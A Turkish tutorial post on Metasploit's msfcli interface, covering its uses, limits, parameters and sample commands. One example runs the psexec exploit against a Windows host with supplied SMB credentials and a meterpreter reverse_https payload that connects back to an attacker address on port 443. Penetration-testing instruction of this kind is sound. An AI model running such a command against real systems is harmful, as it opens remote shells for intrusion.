Metasploit Anaçatısı: MSFCLI Arayüzü

Metasploit anaçatısı bir çok birleşenden oluşmuştur. Bu yazıda Metasploit Framework tarafından sunulan “msfcli” arayüzü incelenecektir.

Metasploit Framework, Kali Linux üzerinde “/usr/share/metasploit-framework” altında toplanmıştır.

cd /usr/share/metasploit-framework
ls -la

metasploit-fundamentals-msfcli-command-line-interface-01

 

Kullanım Amaçları

MsfCli, MsfConsole ile yapılabilecek işlemleri tek bir satırda / adımda gerçekleştiren arayüzdür. Başlıca kullanım amaçları aşağıdaki gibidir:

  • Exploit ve Auxiliary modülleri çalıştırmak
  • Tek bir satırda tüm işlemleri gerçekleştirerek öğrenim kolaylığı sağlamak
  • Yeni exploit’ler test etmek ve geliştirmek
  • İnteraktif erişimin mümkün olmadığı durumlarda kullanmak
  • Exploit işlerinde betiklerle otomatik işlemler gerçekleştirmek
  • Tek seferlik exploit işlemlerini daha hızlı gerçekleştirmek
  • Hangi exploit veya payload kullanılacağı bilindiği durumlarda hız kazanmak

 

Kısıtları

MsfCli arayüzünün başlıca dezavantajları aşağıdaki gibi listelenebilir.

  • MsfConsole arayüzü kadar desteklenmemektedir.
  • Aynı anda sadece tek bir kabuk (shell) açılabildiği için istemci taraflı saldırılarda çok da pratik değildir.
  • MsfConsole tarafından sunulan bazı gelişmiş özellikleri desteklememektedir.

 

Önemli Parametreleri

MsfCli arayüzünde kullanılabilecek önemli parametreler aşağıdaki gibi listelenebilir:

  • -h veya H: Yardımcı dokümantasyon sunar.
  • -E: Seçilen modülü çalıştırır.
  • P: Seçilen modül için uygun Payload değerlerini sunar.
  • O: Seçilen modül için uygun seçenekleri sunar. Böylece hangi seçeneklerin ayarlanabileceği listelenir.

 

Kullanımı

MsfCli kullanımında, seçenek / parametre ataması sırasında msfconsole arayüzünde atama işlemindeki ” “(boşluk) kullanılması yerine, “=” (eşittir) kullanılır. Ayrıca parametrelerin büyük/küçük harf duyarlı olduğu da göz önünde bulundurulmalıdır.

 

Örnek Kullanımlar

MsfCli arayüzü ile çalıştırılabilecek bazı örnek komutlar aşağıdaki gibi listelenebilir.

  • msfcli -h
  • msfcli exploit/multi/samba/usermap_script O
  • msfcli exploit/multi/samba/usermap_script P
  • msfcli exploit/windows/smb/psexec RHOST=192.168.2.182 PAYLOAD=windows/meterpreter/reverse_https LHOST=192.168.2.97 LPORT=443 SMBUser=Tubitak SMBPass=Aa123456 E

metasploit-fundamentals-msfcli-command-line-interface-02

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.